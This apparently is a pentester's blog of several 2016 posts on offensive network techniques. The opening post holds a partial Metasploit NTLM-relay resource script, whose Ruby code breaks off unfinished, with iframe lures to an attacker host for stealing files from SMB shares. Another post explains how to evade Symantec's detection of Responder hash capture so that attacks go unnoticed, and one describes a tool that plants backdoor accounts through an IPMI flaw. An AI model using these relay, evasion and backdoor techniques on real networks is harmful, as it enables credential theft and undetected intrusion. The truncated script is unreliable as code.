Sunday, July 24, 2016

Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. So I have been trying to automate the downloading of all files on a share using metasploit's http_ntlmrelay module. Here is the secinaro, you are on a network with file share servers that host employee's windows documents folder and authenticate using ntlm. Active Directory has anonymous read access, which you can use to find the address to the file server and path the user has access to. Assuming you have only one shot to get the loot I first use RTYPE SMB_LS, then use a sync file to parse the data and download the first file found using SMB_GET. I used a resource file to tie it all together, here is the code I used below.

use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RPORT 445
set URIPATH test1
set SYNCFILE syncfile.rb
set URIPATH test2

print_status("looking for data...")
framework.db.notes.each do |note|
        if (note.ntype == 'ntlm_relay')
                for app in[:Response]
                        p1 = app[1].to_s.split(",")
                        if (p1[0] == '{"type"=>"F"')

[iframe src="http://kali:8080/test1"]
[iframe src="http://kali:8080/test2"]

The issues I'm having are, this method can only download one file at the moment and if the share's path goes deeper then one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out, if you have a solution please let me know! Thank you and enjoy.

Tuesday, May 17, 2016

Bypassing Symantec Endpoint SMB NTLM capture attack detection

A while back I was running Responder on a network to get some hashes. To my surprise, the incident response team pinged me and asked if alerts they were getting from Symantec Endpoint Security [SEP] was from my activities. I social engineered them a little and they ended up sending me a screen cap. The screen cap they sent me said:
Attack: SMB Sniffer Negotiate Protocol Challenge Key 2
Now when I googled that it returned a page which gives a bit more information.

On that page it says:
This signature detects attempts to sniff SMB usernames and passwords through a known challenge key which can then be used to crack the passwords offline.
The key words there are "through a known challenge key". Responder uses the default challenge key of 1122334455667788 and that is how SEP detected this attack. Responder is awesome and has a config file that allows you to change the challenge key to what ever you want, which then bypasses SEP detection of the attack. The config file is found in /usr/share/responder/ on kali 2 systems, simply change the challenge key to something like 2211334455667788 and your attacks will go unnoticed by SEP. Happy hacking :)

Saturday, March 12, 2016


There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability, but because its relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I have found I keep having to brush up on commands and junk every time I come across it which is where my tools comes in.

My IPMIPWN tool does all the real work for you, it will attempt to exploit the cipher 0 vulnerability using a list of predefined default user accounts and setup a backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali, it does require you to have ipmiutils "apt-get install ipmitool" and NMAP installed. Enjoy.

Get IPMIPWN from GitHub

Thursday, March 3, 2016

My Own DROWN Detection Tool

I had to find a quick way to detect the DROWN vulnerability on a large enterprise level network, so this goes more into the vulnerability management realm, but I was tasked with it none the less and I thought others might get some use from my work here as well.

I didn't like the scanning tool from and most of the systems in scope were internal so I couldn't use their online version either. First I tried OpenSSL but the version that comes with Kali 2 does not support SSLv2 even thought the help menu says it does. I was going to try and recompile OpenSSL to add SSLv2 support but that was proving to be a pain in the ass.

That's when I made a little bash script that uses NMAP and TestSSLServer to detect SSLv2 support on port 443 of a web server. All you need to do is provide a list of IPs and it goes to work, unlike all the other tools available at the moment, the output is clear and easy to understand. It does lack features and support for other ports. If the tool proves popular I will be happy to add both. Enjoy and happy hacking :)

Get the DROWN Detection Tool from GitHub.

**UPDATE: Thanks to ngharo for the code contribution. Already merged your changes into master!

Tuesday, February 23, 2016

Low Hanging Fruit Initiative

The Low Hanging Fruit Initiative [LHFI] is my own little project to make life easier on pen-testers like myself. Not that life is that hard for me, I'm just lazy and as I go along, I find things that should be simple are overly complex, overlooked, or under appreciated . So I develop tools, scripts, etc. to get the most juice I can from the low hangers and fill what I feel are gaps in the process of exploitation. Not passing up quarters for dollars has allowed me to take my game to a new level.

The way I see it, the bad guys are not coming into networks and just focusing on the vulnerabilities with CVSS scores of 10, they are searching the network looking for anything they can get their hands on to further their penetration or increase the scope of the breach and I don't understand why we cant do the same. When ever things like this are talked about, they always take the defender approach or the cracker approach, its never really looked at from a pen-testers perspective. Some might say the cracker and pen-testers approach should be the same, but they operate under a different set of restrictions. The most prominent being time for pen-testers, where often the quarters are passed up for a dollar to save time and keep costs low.  I'm not saying people need to rethink their current process, just saying maybe add a step or two. After you found all the show stoppers, take time to revisit the mediums and lows, maybe there is a gem waiting to be discovered using the scripts found here/elsewhere or your own.

The over all goal of the LHFI is to help pen-testers penetrate deeper into a network from more places. I hope this will lead to better secured and resilient networks which is good for everyone. To denote which posts contribute to the LHFI I will start using the LHFI label. If you have scripts, programs, ect. that you think fits under LHFI please let me know. I would be happy to showcase them on my blog. Thank you for reading and happy hacking.

Monday, January 18, 2016

Upgrading to NetHunter 2 on Nexus 7

I love Kali so naturally I put NetHunter 1 on my old Nexus 7 tablet and used it for a while but then NetHunter 2 came along and didn't really offer a upgrade path from 1 to 2. Everything was geared to first installs. Lucky for me the process to do so was really easy if you already put NetHunter on your tablet.

Basically all I had to do was put the new NetHunter zip file downloaded from HERE on the root of the sdcard and boot into Fastboot mode "From a powered down stat press and hold the power + volume down buttons" Then selected recovery mode and used teamwin loader "It was still setup from when I first setup NetHunter 1" to install the zip from sdcard and poof NetHunter was updated to the latest. I did lose all data but I don't keep anything on it so that was no big deal.

The one hang up I have found so far is you need to get pciutils for wifite to work. Just run the following command:
apt-get install pciutils

Thank you and happy hacking :)